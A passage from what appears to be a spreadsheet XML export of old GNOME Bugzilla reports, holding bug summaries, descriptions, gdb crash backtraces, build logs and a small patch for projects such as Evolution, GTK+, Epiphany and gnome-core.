      v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
      v_double = 0 v_pointer = 0x0}}}
	signal_id = 58
	max_sequential_handler_number = 838
	return_value_altered = 1
#27 0xb74a49b8 in IA__g_signal_emit_valist (instance=0x8101078 signal_id=58 detail=0 
    var_args=0xbfd468c0 Ã˜hÃ”Â¿(7'\bx\020\020\b?ÃŒ\205Â·x\020\020\bÃQ\017\b) at gsignal.c:2207
	_flags = 
	_vtable = 
	_cvalues = {{v_int = -1076598568 v_long = -1076598568 v_int64 = 3218368728 v_double = 1.5900854241545911e-314 
    v_pointer = 0xbfd468d8} {v_int = 0 v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 v_long = 0 
    v_int64 = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0} {
    v_int = 0 v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 v_long = 0 v_int64 = 0 v_double = 0 
    v_pointer = 0x0} {v_int = 0 v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 v_long = 0 v_int64 = 0 
    v_double = 0 v_pointer</t>
  </si>
  <si>
    <t>GNOMEMM-113581</t>
  </si>
  <si>
    <t>libbonobomm</t>
  </si>
  <si>
    <t>GNOMEMM</t>
  </si>
  <si>
    <t>correct .h .m4 and .pc files installation</t>
  </si>
  <si>
    <t>- libbonobomm installs files into libgnomemm ang gtkmm directories.
- does not install library specific convert.m4 macro
- installs libbonobomm-2.0-uninstalled.pc</t>
  </si>
  <si>
    <t>bland</t>
  </si>
  <si>
    <t>GEDIT-PLUGINS-113341</t>
  </si>
  <si>
    <t>Indent plugin indents line when no characters selected</t>
  </si>
  <si>
    <t>The indent plugin is great and does its job
unconditionally.  Unfortunately the
unconditionally part is a two-edged sword.  It
happens to indent blank lines (ie lines with 0
characters aside from a newline) as well as lines
without any characters selected (think of an end
brace).
This is a pain in the @$$ especially when
+ selecting blocks of code for indention.
Recipie for destruction:
0. Start gEdit and load the indent plugin.
1. Open a C source file and select a block of code
for indention.  Try + starting on
column 0 of an arbitrary line and ending on column
0 of a line you don't want to be indented such as
before the ending curly-brace of a function.
2. Hit +.
3. Hop up and down with anger as your ending curly
brace gets pushed over when you didn't highlight
anything on that line.</t>
  </si>
  <si>
    <t>eisenwulf</t>
  </si>
  <si>
    <t>GAL-201604</t>
  </si>
  <si>
    <t>clicking twice in separate rows emits double_click</t>
  </si>
  <si>
    <t>click on one row and then very quickly click on a different row. a double_click
signal is emitted on the second row.</t>
  </si>
  <si>
    <t>EVOLUTION-461757</t>
  </si>
  <si>
    <t>memory leaks caused by e_categories_config_get_icon_for().</t>
  </si>
  <si>
    <t>memory leaks caused by e_categories_config_get_icon_for().
The pixmap and bitmap allocated by e_categories_config_get_icon_for() should be freed.</t>
  </si>
  <si>
    <t>hiikezoe</t>
  </si>
  <si>
    <t>GNOME-CORE-50118</t>
  </si>
  <si>
    <t>gsm</t>
  </si>
  <si>
    <t>chash</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  gnome-core
Severity: normal
Version:  1.2.1
Synopsis: chash
Class:    sw-bug
Distribution: Red Hat Linux release 7.0 (Guinness)
System: Linux 2.2.16-22 i686 unknown
C library: glibc-2.1.92-14
C compiler: 2.96
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.3
gnome-libs: gnome-libs 1.2.4
libxml: 1.8.9
gnome-print: gnome-print-0.20-8
gnome-core: gnome-core 1.2.1
Description:
hhh	
Debugging information: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0x405955a9 in __wait4 () from /lib/libc.so.6
#0  0x405955a9 in __wait4 () from /lib/libc.so.6
#1  0x405ff824 in __DTOR_END__ () from /lib/libc.so.6
#2  0x40091b38 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  
#4  __libc_free (mem=0x6279656b) at malloc.c:3025
#5  0x4040ece2 in g_free () from /usr/lib/libglib-1.2.so.0
#6  0x4041758c in g_slist_foreach () from /usr/lib/libglib-1.2.so.0
#7  0x805411b in maybe_display_gui ()
#8  0x401dd8b3 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#9  0x4020fc0a in gtk_handlers_run () from /usr/lib/libgtk-1.2.so.0
#10 0x4020ef4d in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#11 0x4020ccf5 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#12 0x401efe08 in gtk_object_shutdown () from /usr/lib/libgtk-1.2.so.0
#13 0x4024ad9b in gtk_widget_shutdown () from /usr/lib/libgtk-1.2.so.0
#14 0x4024da7f in gtk_window_shutdown () from /usr/lib/libgtk-1.2.so.0
#15 0x401efda9 in gtk_object_destroy () from /usr/lib/libgtk-1.2.so.0
#16 0x40242fb9 in gtk_widget_destroy () from /usr/lib/libgtk-1.2.so.0
#17 0x805405f in maybe_display_gui ()
#18 0x401dd57e in gtk_marshal_BOOL__POINTER () from /usr/lib/libgtk-1.2.so.0
#19 0x4020fc0a in gtk_handlers_run () from /usr/lib/libgtk-1.2.so.0
#20 0x4020ef4d in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#21 0x4020ccf5 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#22 0x40246c39 in gtk_widget_event () from /usr/lib/libgtk-1.2.so.0
#23 0x401dd4f5 in gtk_propagate_event () from /usr/lib/libgtk-1.2.so.0
#24 0x401dc5bf in gtk_main_do_event () from /usr/lib/libgtk-1.2.so.0
#25 0x40291c21 in gdk_event_dispatch () from /usr/lib/libgdk-1.2.so.0
#26 0x4040d987 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#27 0x4040dba1 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#28 0x4040e0ee in g_main_iteration () from /usr/lib/libglib-1.2.so.0
#29 0x401dc0c6 in gtk_main_iteration () from /usr/lib/libgtk-1.2.so.0
#30 0x804fe27 in save_session ()
#31 0x40290958 in gdk_io_invoke () from /usr/lib/libgdk-1.2.so.0
#32 0x4040c1a0 in g_io_unix_dispatch () from /usr/lib/libglib-1.2.so.0
#33 0x4040d987 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#34 0x4040e001 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#35 0x4040e0ee in g_main_iteration () from /usr/lib/libglib-1.2.so.0
#36 0x401dc0c6 in gtk_main_iteration () from /usr/lib/libgtk-1.2.so.0
#37 0x804fe27 in save_session ()
#38 0x40290958 in gdk_io_invoke () from /usr/lib/libgdk-1.2.so.0
#39 0x4040c1a0 in g_io_unix_dispatch () from /usr/lib/libglib-1.2.so.0
#40 0x4040d987 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#41 0x4040e001 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#42 0x4040e1cc in g_main_run () from /usr/lib/libglib-1.2.so.0
#43 0x401dbe57 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#44 0x805094c in main ()
#45 0x404fbb65 in __libc_start_main (main=0x8050740  argc=1 
    ubp_av=0xbffffa14 init=0x804c7c0  fini=0x8056ffc  
    rtld_fini=0x4000df24  stack_end=0xbffffa0c)
    at ../sysdeps/generic/libc-start.c:111
#0  0x405955a9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x405ff824 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x40091b38 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  
No locals.
#4  __libc_free (mem=0x6279656b) at malloc.c:3025
mem = (void *) 0x0
ar_ptr = (arena *) 0x0
p = 0x805f0b0
ar_ptr = (arena *) 0x0
p = 0x805f0b0
#5  0x4040ece2 in g_free () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#6  0x4041758c in g_slist_foreach () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#7  0x805411b in maybe_display_gui ()
No symbol table info available.
------- Bug moved to this database by martin@bugzilla.gnome.org 2000-12-16 16:22 -------
This bug previously known as bug 35301 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=35301
Originally filed under the gnome-core product and general component.
The original reporter of this bug does not have
   an account here. Reassigning to the person who moved
   it here martin@bugzilla.gnome.org.
   Previous reporter was andrew@wow.dyndns.org.
The original owner of this bug does not have
   an account here. Reassigning to the person who moved
   it here martin@bugzilla.gnome.org.
   Previous owner is unknown.
Bug assigned to new owner setting status to NEW.
   Previous status was UNCONFIRMED.
</t>
  </si>
  <si>
    <t>EVOLUTION-213996</t>
  </si>
  <si>
    <t>searches not available in IMAP in offline mode</t>
  </si>
  <si>
    <t>Searching for matching messages in IMAP offline mode returns an error
saying that the feature doesn't work.  
This feature should be turned on since the data is already known by evolution.</t>
  </si>
  <si>
    <t>xkahn</t>
  </si>
  <si>
    <t>LIBGNOME-KEYRING-359968</t>
  </si>
  <si>
    <t>LIBGNOME-KEYRING</t>
  </si>
  <si>
    <t>Doc blurb for gnome_keyring_item_create_sync</t>
  </si>
  <si>
    <t>I had to do a lot of debugging before discovering that gnome_keyring_item_create_sync with update_if_exists=TRUE doesn't match by display_name only attributes.</t>
  </si>
  <si>
    <t>SYSADMIN-502229</t>
  </si>
  <si>
    <t>Mango (obsolete)</t>
  </si>
  <si>
    <t>SYSADMIN</t>
  </si>
  <si>
    <t>Eliminate useless generic ldap authentication error messages from lib/module.php</t>
  </si>
  <si>
    <t>If Bug 502226 is fixed LDAPUtil (lib/ldap.php) will return PEAR error objects instead of null if the connection to the ldap server fails. The generic error message LDAP authentication error will no longer be needed. It is enough to check if the returned object is a PEAR error object to catch all errors coming out of the class.</t>
  </si>
  <si>
    <t>sysadmin-maint</t>
  </si>
  <si>
    <t>GNOME-PYTHON-503603</t>
  </si>
  <si>
    <t>basic-gconf-app.py and simple-view.py</t>
  </si>
  <si>
    <t>Documentation 
Section: In sample programs
In sample programs basic-gconf-app.py and simple-view.py use deprecated word gtk.mainquit() gtk.TRUE and gtk.FALSE
Correct version:
Use gtk.main_quit() True and False
Other information:</t>
  </si>
  <si>
    <t>GNOME-CORE-73669</t>
  </si>
  <si>
    <t>--disable-nls broken?</t>
  </si>
  <si>
    <t>Hi
I am just a person trying to sort out some buildscripts for Gentoo.  
Just a user of Gentoo too not a developer by any means.  I have 
noticed that when I tried to configure --disable-nls I got the error 
message below while `make`ing.  I realise that Gnome is aimed at a 
global audience however for those of us who don't need all those 
languages it is really just bloat and unnecessary.  Perhaps this is a 
known issue?  If so I do hope Gnome 2 will handle this with a little 
more smoothness.
Thanks
Seemant
---- Cut here
gcc -DHAVE_CONFIG_H -I. -I. -I.. -I. -I. -I../intl -I../intl 
-I../panel -DGNOMELOCALEDIR=\/usr/share/locale\ 
-DGNOME_DATADIR=\/usr/share\ 
-DGLADEDIR=\/usr/share/gnome/panel\ 
-DGLOBAL_CONFDIR=\/etc/gnome/panel-config\ -I/usr/include 
-I/usr/include/gnome-1.0 -DNEED_GNOMESUPPORT_H 
-I/usr/lib/gnome-libs/include -I/usr/include/glib-1.2 
-I/usr/lib/glib/include -I/usr/include/orbit-1.0 
-I/usr/include/gtk-1.2 -I/usr/X11R6/include -I/usr/include/libcapplet1 
-I/usr/include/gnome-1.0 -DNEED_GNOMESUPPORT_H 
-I/usr/lib/gnome-libs/include -I/usr/include/glib-1.2 
-I/usr/lib/glib/include -I/usr/include/orbit-1.0 
-I/usr/include/gtk-1.2 -I/usr/X11R6/include -I/usr/include/glib-1.2 
-I/usr/lib/glib/include -I/usr/include/orbit-1.0 
-I/usr/include/gnome-1.0 -I/usr/include/freetype2 
-DNEED_GNOMESUPPORT_H -I/usr/lib/gnome-libs/include 
-I/usr/include/gtk-1.2 -I/usr/include/glib-1.2 -I/usr/lib/glib/include 
-I/usr/X11R6/include -I/usr/include/gdk-pixbuf-1.0 
-I/usr/include/gnome-xml -I/usr/include/libglade-1.0 
-I/usr/include/gnome-xml -I/usr/include/gdk-pixbuf-1.0 
-I/usr/include/gtk-1.2 -I/usr/include/glib-1.2 -I/usr/lib/glib/include 
-I/usr/X11R6/include  -I/usr/include/gtk-1.2 -I/usr/include/glib-1.2 
-I/usr/lib/glib/include -I/usr/X11R6/include  -mcpu=i686 -march=i686 
-O3 -pipe -I/usr/include/gdk-pixbuf-1.0 -I/usr/include/gtk-1.2 
-I/usr/include/glib-1.2 -I/usr/lib/glib/include -I/usr/X11R6/include 
-Wall -Wunused  -c gnome-panel-screenshot.c
gnome-panel-screenshot.c: In function `main':
gnome-panel-screenshot.c:1016: warning: implicit declaration of 
function `setlocale'
gnome-panel-screenshot.c:1016: `LC_ALL' undeclared (first use in this 
function)
gnome-panel-screenshot.c:1016: (Each undeclared identifier is reported 
only once
gnome-panel-screenshot.c:1016: for each function it appears in.)
gnome-panel-screenshot.c:1017: warning: statement with no effect
gnome-panel-screenshot.c:1018: warning: statement with no effect
make[3]: *** [gnome-panel-screenshot.o] Error 1
make[3]: Leaving directory 
`/var/tmp/portage/gnome-core-1.4.0.6-r2/work/gnome-core-1.4.0.6/panel'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory 
`/var/tmp/portage/gnome-core-1.4.0.6-r2/work/gnome-core-1.4.0.6/panel'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory 
`/var/tmp/portage/gnome-core-1.4.0.6-r2/work/gnome-core-1.4.0.6'
make: *** [all-recursive-am] Error 2</t>
  </si>
  <si>
    <t>seemant</t>
  </si>
  <si>
    <t>GNOME-PRINT-95631</t>
  </si>
  <si>
    <t>print preview</t>
  </si>
  <si>
    <t>Failure compiling libgnomeprintui/doc/libgnomeprintui-scan.c</t>
  </si>
  <si>
    <t>Failure compiling libgnomeprintui/doc/libgnomeprintui-scan.c with    
an undefined reference to gnome_print_copies_selector_get_type.   
This patch fixes it.  
  Index: libgnomeprintui.types 
=================================================================== 
RCS file: /cvs/gnome/libgnomeprintui/doc/libgnomeprintui.typesv 
retrieving revision 1.3 
diff -u -r1.3 libgnomeprintui.types 
--- libgnomeprintui.types       6 Sep 2002 06:22:47 -0000       1.3 
+++ libgnomeprintui.types       12 Oct 2002 21:53:55 -0000 
@@ -97 +97 @@ 
 gnome_font_selection_get_type 
 gnome_font_preview_get_type 
 gnome_font_dialog_get_type 
-gnome_print_copies_selector_get_type 
+gnome_print_copies_selection_get_type 
 gnome_print_dialog_get_type 
 gnome_printer_selector_get_type 
 gnome_print_master_preview_get_type</t>
  </si>
  <si>
    <t>alfons</t>
  </si>
  <si>
    <t>GTK+-151994</t>
  </si>
  <si>
    <t>save as entry shouldn't complete without path character</t>
  </si>
  <si>
    <t>Currently it's really annoying that the save as entry starts completing
to existing files as you try to type a new file name ... you are
trying to *avoid* existing files not enter them again.
At a minimum it should only have folders not files in its completion
set (which would make navigation considerably nicer) but I think
it should go further and not start completing at all until the
entry contains a / or ~ (might need platform specific modification).</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-69271</t>
  </si>
  <si>
    <t>Embossing image crashes background capplet [gdk_pixbuf_finalize]</t>
  </si>
  <si>
    <t xml:space="preserve">Package: control-center
Severity: normal
Version: 1.4.0.1
Synopsis: Embossing a particular image crashes
Bugzilla-Product: control-center
Bugzilla-Component: background
Description:
Every time I try embossing this image it crashs the applet.
Hopefully I can attach the image. If not give me an e-mail and I'll
forward it.
Debugging Information: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0x406ab8f9 in wait4 () from /lib/libc.so.6
#0  0x406ab8f9 in wait4 () from /lib/libc.so.6
#1  0x407241f0 in __check_rhosts_file () from /lib/libc.so.6
#2  0x40136286 in gnome_init () from /usr/lib/libgnomeui.so.32
#3  0x40634848 in sigaction () from /lib/libc.so.6
#4  0x40679ac3 in free () from /lib/libc.so.6
#5  0x405f7226 in gdk_pixbuf_finalize () from /usr/lib/libgdk_pixbuf.so.2
#6  0x405f71f2 in gdk_pixbuf_finalize () from /usr/lib/libgdk_pixbuf.so.2
#7  0x405f711b in gdk_pixbuf_unref () from /usr/lib/libgdk_pixbuf.so.2
#8  0x0804d136 in copyState ()
#9  0x0804d9c3 in copyState ()
#10 0x402781c5 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#11 0x402a7b7c in gtk_signal_remove_emission_hook ()
   from /usr/lib/libgtk-1.2.so.0
#12 0x402a6fe5 in gtk_signal_set_funcs () from /usr/lib/libgtk-1.2.so.0
#13 0x402a50c3 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#14 0x402dbc1e in gtk_widget_activate () from /usr/lib/libgtk-1.2.so.0
#15 0x40280624 in gtk_menu_shell_activate_item () from /usr/lib/libgtk-1.2.so.0
#16 0x4027f8aa in gtk_menu_shell_deactivate () from /usr/lib/libgtk-1.2.so.0
#17 0x40277e4f in gtk_marshal_BOOL__POINTER () from /usr/lib/libgtk-1.2.so.0
#18 0x402a7023 in gtk_signal_set_funcs () from /usr/lib/libgtk-1.2.so.0
#19 0x402a50c3 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#20 0x402dbadb in gtk_widget_event () from /usr/lib/libgtk-1.2.so.0
#21 0x40277d95 in gtk_propagate_event () from /usr/lib/libgtk-1.2.so.0
#22 0x40276efe in gtk_main_do_event () from /usr/lib/libgtk-1.2.so.0
#23 0x40325477 in gdk_wm_protocols_filter () from /usr/lib/libgdk-1.2.so.0
#24 0x40084578 in g_get_current_time () from /usr/lib/libglib-1.2.so.0
#25 0x40084b83 in g_get_current_time () from /usr/lib/libglib-1.2.so.0
#26 0x40084d1c in g_main_run () from /usr/lib/libglib-1.2.so.0
#27 0x402767f7 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#28 0x400214f5 in capplet_corba_gtk_main () from /usr/lib/libcapplet.so.0
#29 0x40020e7c in capplet_gtk_main () from /usr/lib/libcapplet.so.0
#30 0x0804fa8d in main ()
#31 0x4062465f in __libc_start_main () from /lib/libc.so.6
#0  0x406ab8f9 in wait4 () from /lib/libc.so.6
No symbol table info available.
#1  0x407241f0 in __check_rhosts_file () from /lib/libc.so.6
No symbol table info available.
#2  0x40136286 in gnome_init () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  0x40634848 in sigaction () from /lib/libc.so.6
No symbol table info available.
#4  0x40679ac3 in free () from /lib/libc.so.6
No symbol table info available.
#5  0x405f7226 in gdk_pixbuf_finalize () from /usr/lib/libgdk_pixbuf.so.2
No symbol table info available.
#6  0x405f71f2 in gdk_pixbuf_finalize () from /usr/lib/libgdk_pixbuf.so.2
No symbol table info available.
#7  0x405f711b in gdk_pixbuf_unref () from /usr/lib/libgdk_pixbuf.so.2
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-01-21 08:45 -------
The original reporter (scott@tranzoa.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component tvgm@ximian.com.
</t>
  </si>
  <si>
    <t>EVOLUTION-205576</t>
  </si>
  <si>
    <t>vfolder editor size</t>
  </si>
  <si>
    <t>This is a cosmetic / usability thing
In the vfolder editor select a vfolder with lost (2+) criterea. The edit
rule window opens with a fixed size which shows about 1 and 1/2 critera. 
It would be nice if the edit rule opened to show all rules upto some upper
limit (5?).
Alternatively you could make the vFolder sources box smaller  as the data
in it is more compact.</t>
  </si>
  <si>
    <t>pgc</t>
  </si>
  <si>
    <t>F-SPOT-343518</t>
  </si>
  <si>
    <t>Tags</t>
  </si>
  <si>
    <t>Add comma ( ) when starting 'Tag Typing'</t>
  </si>
  <si>
    <t>When you start 'Tag Typing' (pressing t) the UI no longer add the first   if there is already some tags.
It was ok in the past when Nat introduced is patch ...</t>
  </si>
  <si>
    <t>GNOME-CALCULATOR-142888</t>
  </si>
  <si>
    <t>gcalctool is not connected to the die signal</t>
  </si>
  <si>
    <t>Because of this when gcalctool is removed from gnome-session-properties its not
getting removed. Attaching a small patch for this bug. Thanks.</t>
  </si>
  <si>
    <t>balamurali.viswanathan</t>
  </si>
  <si>
    <t>GTKHTML-258759</t>
  </si>
  <si>
    <t>Wrapping long quoted lines puts in extra spaces</t>
  </si>
  <si>
    <t>Description of Problem:
Try to reply to a non-HTML mail with long lines.  You can hit Alt-q in the
composer to wrap long quoted lines but they get wrapped with an extra
space at the beginning of each line in a paragraph.
Steps to reproduce the problem:
1. Reply to a mail with long lines.
2. You'll get quoted long lines like
&gt; This is a very long line blah blah blah blah ...
3. Hit Alt-q on one of those.  You'll get this:
&gt; This is a very
&gt;  long line blah blah
&gt;  blah blah ....
That is every line except the first one has an extra space after
the &gt; sign.  It should be
&gt; This is a very
&gt; long line blah blah
&gt; blah blah ....</t>
  </si>
  <si>
    <t>GTK+-145107</t>
  </si>
  <si>
    <t>Can memset at end of gdk_pixmap_new be removed?</t>
  </si>
  <si>
    <t>Commenting out the memset of the pixmap data to 0 at the end of gtk_pixmap_new
seems to make a performance difference according to the profiling I'm doing. 
The x11 implementation uses XCreatePixmap which according to the man page
creates a pixmap with undefined contents.  I haven't seen any visible problems
since I commented this out in my sources.
Is there a reason for the memset on Windows?</t>
  </si>
  <si>
    <t>TOMBOY-300914</t>
  </si>
  <si>
    <t>Running tomboy with no arguments does nothing</t>
  </si>
  <si>
    <t>Version details: 0.3.1
Distribution/Version: Ubuntu Hoary Final
run tomboy from command line with no arguments.
expected:
Start tomboy and put icon in the tray.
what happens:
a message is printed All done. Ciao and nothing else.
From the man page for tomboy -
When run without any options the Tomboy note menu appears in the Gnome Panelâ€™s
 notification  tray  area.
If you run tomboy --help it says that tomboy --tray-icon runs tomboy in the
system tray which works but is not mentioned in the man page.</t>
  </si>
  <si>
    <t>ryan.rousseau</t>
  </si>
  <si>
    <t>EVOLUTION-251893</t>
  </si>
  <si>
    <t>mdk9.1 head snaps missing libevolution-addressbook.so</t>
  </si>
  <si>
    <t>If I try to open a composer window in HEAD snaps on Mdk 9.1 I get:
Could not create composer window:
Unable to activate address selector control.
The error from the activation system is:
g_module_open of `/usr/lib/evolution/1.5/components/
libevolution-addressbook.so' failed with `/usr/lib/evolution/1.5
components/libevolution-addressbook.so: cannot open shared
object file: No such file or directory'
Confirmed with ls and rpm -ql.  rh9 HEAD snaps have that file FWIW.
Problem exists in Mdk 9.1 HEAD snaps dated 12060345 (but not in RH 9 HEAD
snaps dated 12060429).
I'm assuming under the circumstances that this is a packaging bug.</t>
  </si>
  <si>
    <t>mtgordon</t>
  </si>
  <si>
    <t>EVOLUTION-214067</t>
  </si>
  <si>
    <t>Calendar Information Lost.  Can't open calendar.ics</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
I just downloaded the latest snapshot (release candiate 1).  
Steps to reproduce the problem:
1. On opening the following error shows up twice: 'Could not open
/home/alex/evolution/local/Calendar/calendar.ics. No items from the
calendar folder will be migrated to the Tasks folder.' My calendar
information is all gone.  
2. When I try to save a new appointment I get the following error: 'Could
not update object'. 
How often does this happen? 
This happens everytime I start Evolution or attempt to create a new
appointment.</t>
  </si>
  <si>
    <t>alexjramos</t>
  </si>
  <si>
    <t>GDESKLETS-147524</t>
  </si>
  <si>
    <t>Background image incorrect when part of display offscreen</t>
  </si>
  <si>
    <t>If the top-left corner of a desklet is positioned offscreen (i.e. negative x or
y coordinates for window position) the backgound image is not composited
properly into the desklet.  This is because the wallpaper-grabbing code first
crops negative coordinates to zero and thus grabs the wallpaper contents at
zero not at the actual desklet position.
The attached patch fixes the problem for me by just not truncating negative
window coordinates.  I'm not sure if this will have unexpected ramifications
with some code somewhere I haven't run into yet though.</t>
  </si>
  <si>
    <t>EPIPHANY-146902</t>
  </si>
  <si>
    <t>Epiphany Crash</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Debian testing/unstable
Package: epiphany
Severity: normal
Version: GNOME2.6.1 1.2.6
Gnome-Distributor: Debian
Synopsis: Epiphany Crash
Bugzilla-Product: epiphany
Bugzilla-Component: General
Bugzilla-Version: 1.2.6
BugBuddy-GnomeVersion: 2.0 (2.6.1.1)
Description:
Description of the crash:
Crashed (many times) trying to download a file from sourceforge
Steps to reproduce the crash:
1. 
2. 
3. 
Expected Results:
How often does this happen?
Additional Information:
Debugging Information:
Backtrace was generated from '/usr/bin/epiphany'
(no debugging symbols found)...Using host libthread_db library
/lib/tls/libthread_db.so.1.
(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Thread debugging using libthread_db enabled]
[New Thread 1089591520 (LWP 1959)]
[New Thread 1120553904 (LWP 1972)]
[Thread debugging using libthread_db enabled]
[New Thread 1089591520 (LWP 1959)]
[New Thread 1120553904 (LWP 1972)]
[Thread debugging using libthread_db enabled]
[New Thread 1089591520 (LWP 1959)]
[New Thread 1120553904 (LWP 1972)]
(no debugging symbols found)...[New Thread 1107389360 (LWP 1971)]
(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0x4075f431 in __waitpid_nocancel
() from /lib/tls/libpthread.so.0
#0  0x4075f431 in __waitpid_nocancel () from /lib/tls/libpthread.so.0
#1  0x401c8f48 in libgnomeui_module_info_get ()
   from /usr/lib/libgnomeui-2.so.0
#2  0x4003a562 in nsProfileLock::FatalSignalHandler ()
   from /usr/lib/libgtkembedmoz.so
#3  
#4  0x40b12f19 in raise () from /lib/tls/libc.so.6
#5  0x40c20ebc in ?? () from /lib/tls/libc.so.6
#6  0x00000004 in ?? ()
#7  0x40b14771 in abort () from /lib/tls/libc.so.6
#8  0x00000000 in ?? ()
#9  0x00000020 in ?? ()
#10 0x00000000 in ?? ()
#11 0x00000000 in ?? ()
#12 0x00000000 in ?? ()
#13 0x00000000 in ?? ()
#14 0x00000000 in ?? ()
#15 0x00000000 in ?? ()
#16 0x00000000 in ?? ()
#17 0x00000000 in ?? ()
#18 0x00000000 in ?? ()
#19 0x00000000 in ?? ()
#20 0x00000000 in ?? ()
#21 0x00000000 in ?? ()
#22 0x00000000 in ?? ()
#23 0x00000000 in ?? ()
#24 0x00000000 in ?? ()
#25 0x00000000 in ?? ()
#26 0x00000000 in ?? ()
#27 0x00000000 in ?? ()
#28 0x00000000 in ?? ()
#29 0x00000000 in ?? ()
#30 0x00000000 in ?? ()
#31 0x00000000 in ?? ()
#32 0x00000000 in ?? ()
#33 0x00000000 in ?? ()
#34 0x00000000 in ?? ()
#35 0x00000000 in ?? ()
#36 0x00000000 in ?? ()
#37 0x00000000 in ?? ()
#38 0x00000000 in ?? ()
#39 0x00000000 in ?? ()
#40 0x00000000 in ?? ()
#41 0x08878a80 in ?? ()
#42 0x00000000 in ?? ()
#43 0x409ba274 in g_free () from /usr/lib/libglib-2.0.so.0
#44 0x409bc904 in g_log () from /usr/lib/libglib-2.0.so.0
#45 0x080e32f5 in ephy_ensure_dir_exists ()
#46 0x00000004 in ?? ()
Thread 3 (Thread 1107389360 (LWP 1971)):
#0  0x40bbcd05 in poll () from /lib/tls/libc.so.6
No symbol table info available.
#1  0x4015a939 in PR_OpenDir () from /usr/lib/libnspr4.so
No symbol table info available.
#2  0x411ad8d2 in NSGetModule () from
/usr/lib/mozilla/components/libnecko.so
No symbol table info available.
#3  0x411adea9 in NSGetModule () from
/usr/lib/mozilla/components/libnecko.so
No symbol table info available.
#4  0x400e142b in nsThread::Main () from /usr/lib/mozilla/libxpcom.so
No symbol table info available.
#5  0x4015bf79 in PR_Select () from /usr/lib/libnspr4.so
No symbol table info available.
#6  0x407599b4 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#7  0x00000000 in ?? ()
No symbol table info available.
Thread 2 (Thread 1120553904 (LWP 1972)):
#0  0x4075c2c0 in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0x401565f4 in PR_Unlock () from /usr/lib/libnspr4.so
No symbol table info available.
#2  0x401567ee in PR_WaitCondVar () from /usr/lib/libnspr4.so
No symbol table info available.
#3  0x400e432b in TimerThread::Run () from /usr/lib/mozilla/libxpcom.so
No symbol table info available.
#4  0x400e142b in nsThread::Main () from /usr/lib/mozilla/libxpcom.so
No symbol table info available.
#5  0x4015bf79 in PR_Select () from /usr/lib/libnspr4.so
No symbol table info available.
#6  0x407599b4 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#7  0x00000000 in ?? ()
No symbol table info available.
Thread 1 (Thread 1089591520 (LWP 1959)):
#0  0x4075f431 in __waitpid_nocancel () from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0x401c8f48 in libgnomeui_module_info_get ()
   from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#2  0x4003a562 in nsProfileLock::FatalSignalHandler ()
   from /usr/lib/libgtkembedmoz.so
No symbol table info available.
#3  
No symbol table info available.
#4  0x40b12f19 in raise () from /lib/tls/libc.so.6
No symbol table info available.
#5  0x40c20ebc in ?? () from /lib/tls/libc.so.6
No symbol table info available.
#6  0x00000004 in ?? ()
No symbol table info available.
#7  0x40b14771 in abort () from /lib/tls/libc.so.6
No symbol table info available.
#8  0x00000000 in ?? ()
No symbol table info available.
#9  0x00000020 in ?? ()
No symbol table info available.
#10 0x00000000 in ?? ()
No symbol table info available.
#11 0x00000000 in ?? ()
No symbol table info available.
#12 0x00000000 in ?? ()
No symbol table info available.
#13 0x00000000 in ?? ()
No symbol table info available.
#14 0x00000000 in ?? ()
No symbol table info available.
#15 0x00000000 in ?? ()
No symbol table info available.
#16 0x00000000 in ?? ()
No symbol table info available.
#17 0x00000000 in ?? ()
No symbol table info available.
#18 0x00000000 in ?? ()
No symbol table info available.
#19 0x00000000 in ?? ()
No symbol table info available.
#20 0x00000000 in ?? ()
No symbol table info available.
#21 0x00000000 in ?? ()
No symbol table info available.
#22 0x00000000 in ?? ()
No symbol table info available.
#23 0x00000000 in ?? ()
No symbol table info available.
